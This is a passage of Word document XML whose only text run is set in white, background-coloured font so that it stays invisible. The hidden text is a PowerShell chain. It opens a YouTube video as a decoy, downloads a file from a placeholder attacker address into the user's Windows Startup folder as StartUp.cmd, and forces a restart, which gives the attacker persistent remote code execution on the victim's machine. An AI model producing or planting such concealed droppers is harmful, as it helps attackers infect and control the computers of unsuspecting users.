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10A3" w14:textId="48403DB1" w:rsidR="00861D00" w:rsidRPr="00F64B4E" w:rsidRDefault="001C68F5" w:rsidP="001C68F5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64B4E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>start msedge `https://www.youtube.com/watch?v=uXbGQiXsRes';iwr https://</w:t>
      </w:r>
      <w:r w:rsidR="00D83542" w:rsidRPr="00F64B4E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>&lt;YourIP&gt;/Direcotory/filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00F64B4E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.cmd"; shutdown /r</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00861D00" w:rsidRPr="00F6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5"/>
    <w:rsid w:val="001C68F5"/>
    <w:rsid w:val="007E6884"/>
    <w:rsid w:val="00861D00"/>
    <w:rsid w:val="00D83542"/>
    <w:rsid w:val="00F64B4E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23B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{47827F38-D217-4AC8-99CB-89D9F00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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-22T23:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-22T23:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>